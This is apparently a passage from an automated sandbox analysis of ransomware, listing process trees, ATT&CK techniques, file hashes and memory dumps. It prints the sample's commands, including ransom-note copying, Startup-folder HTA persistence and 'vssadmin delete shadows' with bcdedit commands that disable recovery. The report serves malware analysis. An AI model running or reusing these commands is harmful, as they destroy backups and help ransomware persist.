        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{61087~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1312
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1968
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Default\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\Default\NTUSER.DAT.LOG2" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\Default\NTUSER.DAT.LOG2"
        5⤵
        
        PID:2640
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\Default\NTUSER.DAT.LOG2" /E /G Admin:F /C
        6⤵
        
        PID:1020
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\Default\NTUSER.DAT.LOG2"
        6⤵
        Views/modifies file attributes
        
        PID:3036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\Public\LIBRAR~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1296
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" && "C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "TOTALCIP_233" "60000"
        5⤵
        Loads dropped DLL
        
        PID:2536
      - C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "TOTALCIP_233" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KDCmSj3O.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "TOTALCIP_233" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:1276
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\tjyu8ckN.cmd"
        8⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:1708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe" > "C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" && "C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FINISH" "60000"
        5⤵
        Loads dropped DLL
        
        PID:1628
      - C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FINISH" "60000"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tOBxViTf.exe" "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\" "N00fBwZXjOQTTX9M" "FINISH" "60000"
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:2580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\8X2s7SDw.cmd"
        8⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        9⤵
        Runs ping.exe
        
        PID:784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C del /f /q "C:\Users\Admin\AppData\Roaming\Microsoft\xr9qnma2.exe"
        5⤵
        
        PID:1496
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\N00FBW~1.HTA" > "C:\Users\Admin\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta"
        5⤵
        
        PID:2448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\N00FBW~1.HTA" > "C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\N00fBwZXjOQTTX9M.hta"
        5⤵
        Drops file in Program Files directory
        
        PID:2692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\OylXD3aD.cmd"
        5⤵
        
        PID:2696
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 localhost
        6⤵
        Runs ping.exe
        
        PID:2028
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\N00fBwZXjOQTTX9M.hta"
        6⤵
        Modifies Internet Explorer settings
        
        PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\SysWOW64\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\9fRQNF7p.cmd"
    3⤵
    - Deletes itself
    - Suspicious use of WriteProcessMemory
    PID:2968
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 3 localhost
      4⤵
      Runs ping.exe
      PID:2980

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
PID:1808
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2408
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2532
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1800

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N00fBwZXjOQTTX9M.hta

Filesize
3KB

MD5
ba6a676250fffbceb1014d1933e605e2

SHA1
a05b371504daffaa882f50975c80fea50ece750c

SHA256
c2b25b6af5e2b5ac4298cf5ed33c13c1ba36a61e2499a7ffca473931d529af82

SHA512
d97f73b3afb76748717969781b42fa0f03cd3601e21d30e7adbf05a4a5c09e41245bb00aed3977604d8919d09a9e7aad01bd186f8fa2fe536479bcb467e4a64d

Download Submit
C:\Users\Admin\AppData\Roaming\WhatHappenedWithFiles.rtf

Filesize
5KB

MD5
3ba34b050e66a1c6eb40b164d9872edc

SHA1
c4841110e990dcde7b5037d3359d8d0612b909b6

SHA256
f9c92cb075271b85859a34e67fb06f4a5d011546ef6e6bec0e5d0a669e627aaa

SHA512
195794ea7b35136e70504cc7d701c2d42b1d9dd43066bdd922c383f323a7acd876a14b3aeabae28bdcaf132d7820473780db68426571e576a67cc2a2c6b7f034

Download Submit
C:\Users\Admin\AppData\Roaming\YLTCBC~1\2km925ZW.exe

Filesize
363KB

MD5
36a0cefeb8b0a606358142d4140ea7cf

SHA1
03ce13b4f60d2fc632b67b41b82b5e8cfaf9939f

SHA256
467c2b23b785df7b45758143387e9cc5a588718ae0640b3f01b1c19679b011be

SHA512
63304f3ddca578beac157197581e6a2a762d9cf1fb08fa6ae85dcdc26340ae64badb0f4a9cb47521315c366b70bd0cf89bf1b72be29f89e2d91504cec7ca9093

Download Submit
C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\1TO4UAic.cmd

Filesize
141B

MD5
1adfcb12acc0d3236ed4e69ee3f78916

SHA1
8d5aa93668c814f0b0d350ef55ef655b05a31e69

SHA256
dd5408524cad5cedf8cf8d7ccc68ff94b545cee8a27a110780554044d8d8059b

SHA512
43cf8e1eb93ced5b6fb6195a5bf4e4ff907815ce82de0192aeae5b3e84ddc7136c8a9a9924224260ae4665192b57a4fa85aade6b1b51fd37bd773a794d692c71

Download Submit
C:\Users\Admin\AppData\Roaming\ylTcbCDwEhhj\9fRQNF7p.cmd

Filesize
141B

MD5
70e41798d78ff99f023db4d3e2ad495d

SHA1
1316c3b1481f5e7e0cf61ed1d17701a6620ecd0f

SHA256
f419b969138c8966126c2866f8930ba41498ab6cfb3ed259ac3e59afe7fc41b9

SHA512
70815985783d2a87aba07cfb746810bc8ec7e59fdc1aad9eaf5af7ae1034a0cadd7d28ad85781c61fb31f3e313b4ecf9f7db387a128738c5f295976ce9a905b4

Download Submit
\Users\Admin\AppData\Local\Temp\RZQHvJ7k.exe

Filesize
3KB

MD5
b241596389982034a5a00cef15f36419

SHA1
517580a02b1d7606cac27419f787b748bebb4289

SHA256
a120506931abfdeab45fb6583e32842c90626a92d601db2f57146ee3aa64a50c

SHA512
116be5523563dc197d65380bf9f7f4ac87c147a8e09149c7777861dae974c42a1533e6ed9a2b3aec675b8ad7039b58d3d5e40fe49dc3c0a7100db2d74c11b97a

Download Submit
memory/396-456-0x0000000000648000-0x000000000068A000-memory.dmp

Filesize
264KB

Download
memory/772-162-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/840-287-0x00000000005F0000-0x00000000006F0000-memory.dmp

Filesize
1024KB

Download
memory/1144-452-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1164-457-0x00000000008E8000-0x000000000092A000-memory.dmp

Filesize
264KB

Download
memory/1276-777-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1276-785-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1544-748-0x0000000000590000-0x0000000000690000-memory.dmp

Filesize
1024KB

Download
memory/1928-473-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1928-488-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/1972-454-0x0000000000668000-0x00000000006AA000-memory.dmp

Filesize
264KB

Download
memory/2028-508-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2036-475-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2036-550-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2064-760-0x0000000000550000-0x0000000000650000-memory.dmp

Filesize
1024KB

Download
memory/2100-1-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/2240-326-0x00000000002F0000-0x00000000003F0000-memory.dmp

Filesize
1024KB

Download
memory/2256-532-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2412-31-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2484-46-0x0000000000520000-0x0000000000620000-memory.dmp

Filesize
1024KB

Download
memory/2512-471-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2512-742-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2512-220-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2516-493-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2516-474-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2580-774-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2584-533-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2636-462-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-8-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-27-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-5-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-4-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-10-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-12-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2688-9-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-2-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2688-11-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2728-464-0x0000000000578000-0x00000000005BA000-memory.dmp

Filesize
264KB

Download
memory/2772-234-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2788-61-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2788-50-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2788-59-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2908-527-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download
memory/2988-467-0x0000000000400000-0x0000000000510000-memory.dmp

Filesize
1.1MB

Download